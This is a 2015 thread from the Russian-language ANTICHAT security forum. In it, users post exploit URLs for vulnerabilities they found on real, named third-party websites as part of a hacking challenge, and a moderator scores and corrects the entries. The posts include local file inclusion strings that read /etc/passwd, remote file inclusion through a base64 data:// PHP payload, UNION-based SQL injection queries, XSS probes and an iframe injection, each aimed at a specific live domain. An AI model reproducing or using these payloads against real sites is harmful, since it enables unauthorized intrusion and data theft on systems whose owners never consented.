ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.06.2015, 12:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
6419
Репутация:
2
|
|
|
|
|
|
22.06.2015, 14:04
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
всем добавил. sqli из паблика не зачтены.
|
|
|
22.06.2015, 23:06
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
для тех, кто уже прошел (на данный момент это только @3nvY). предлагаю повысить свой скилл, найдя все уязвимости из списка. это шанс проявить себя и разобраться с основным типом уязвимостей. |
|
|
|
24.06.2015, 22:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
15245
Репутация:
11
|
|
Сайт: hfboapps.ucr.edu
Уязвимость: LFI
Эксплойт:
Код:
Code:
http://fboapps.ucr.edu/policies/index.php?path=/etc/passwd
Сайт: www.gamsc.com
Уязвимость: LFI
Эксплойт:
Код:
Code:
http://www.gamsc.com/index.php?filename=../../../../../../../etc/passwd
Сайт: www.mycklaflon.se
Уязвимость: RFI
Эксплойт:
Код:
Code:
www.mycklaflon.se/index1.asp?page=http://www.vk.com
|
|
|
|
25.06.2015, 00:33
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от 3nvY
3nvY said:
↑
Сайт:
www.mycklaflon.se
Уязвимость: RFI
Эксплойт:
Код:
Code:
www.mycklaflon.se/index1.asp?page=http://www.vk.com
не RFI, но IFRAME Injection
|
|
|
|
25.06.2015, 22:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
6419
Репутация:
2
|
|
1)Сайт: http://www.felixfilm.se/film.php?id=77
Уязвимость: SQLi
Эксплойт: http://www.felixfilm.se/film.php?id=...,6,7,8,9,10 --
2)Сайт: http://prontowash.com/usa/location.php?id=2
Уязвимость: SQLi
Эксплойт: http://prontowash.com/usa/location.php?id=-2 UNION SELECT 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15--
3)Сайт: http://www.comtecwash.com/photos.php?id=1
Уязвимость: SQLi
Эксплойт: http://www.comtecwash.com/photos.php?id=-1 UNION SELECT 1,2,3,4,version(),6,7,8,9,10--
4)Сайт: http://odessa-life.od.ua
Уязвимость: XSS
Эксплойт: http://odessa-life.od.ua/gue/search
P.S В поиске: alert('1')
5)Сайт: http://mapexpert.com.ua/index_ru.php?id=67&table=news
Уязвимость: SQLi
Эксплойт: http://mapexpert.com.ua/index_ru.php...--+&table=news
P.S Там еще и XSS уязвимость есть: вместо 3,5 или 7 подставляем alert('antichat.ru')
6)Сайт: http://prokudin-gorskiy.ru
Уязвимость: XSS
Эксплойт: http://prokudin-gorskiy.ru/search.php?send=on&scope=1&key=alert('antichat.ru' ) |
|
|
|
28.06.2015, 19:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
15245
Репутация:
11
|
|
Сайт: www.walkandtrain.com
Уязвимость: RFI
Эксплоит:
Код:
Code:
http://www.walkandtrain.com/index.php?x=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA%2FPg%3D%3D
Сайт: railusers.net
Уязвимость: RFI
Эксплоит:
Код:
Code:
http://railusers.net/index.php?link=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA%2FPg%3D%3D
Подскажите пожалуйста где почитать инфу по Local File Reading(LFR). На ачате и в гугле чёт не могу найти. |
|
|
|
28.06.2015, 22:44
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от 3nvY
3nvY said:
↑
Сайт:
www.walkandtrain.com
Уязвимость: RFI
Эксплоит:
Код:
Code:
http://www.walkandtrain.com/index.php?x=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA%2FPg%3D%3D
Сайт: railusers.net
Уязвимость: RFI
Эксплоит:
Код:
Code:
http://railusers.net/index.php?link=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA%2FPg%3D%3D
Подскажите пожалуйста где почитать инфу по Local File Reading(LFR). На ачате и в гугле чёт не могу найти. да тут ничего особенного. просто чтение локальных файлов. в php это readfile, file_get_contents и т. д. никаких особых фишек там нет, разве что некоторые функции поддерживают нуль-байт
|
|
|
|
28.06.2015, 22:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
15245
Репутация:
11
|
|
Сообщение от 3nvY
3nvY said:
↑
Сайт:
www.walkandtrain.com
Уязвимость: RFI
Эксплоит:
Код:
Code:
http://www.walkandtrain.com/index.php?x=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA%2FPg%3D%3D
Сайт: railusers.net
Уязвимость: RFI
Эксплоит:
Код:
Code:
http://railusers.net/index.php?link=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA%2FPg%3D%3D
То есть это не RFI, или это ответ на мой вопрос. Сори за оффтоп я немного туго мыслящий
|
|
|
|
28.06.2015, 23:21
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от 3nvY
3nvY said:
↑
То есть это не RFI, или это ответ на мой вопрос. Сори за оффтоп я немного туго мыслящий ответ на вопрос. но да, это RFI
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
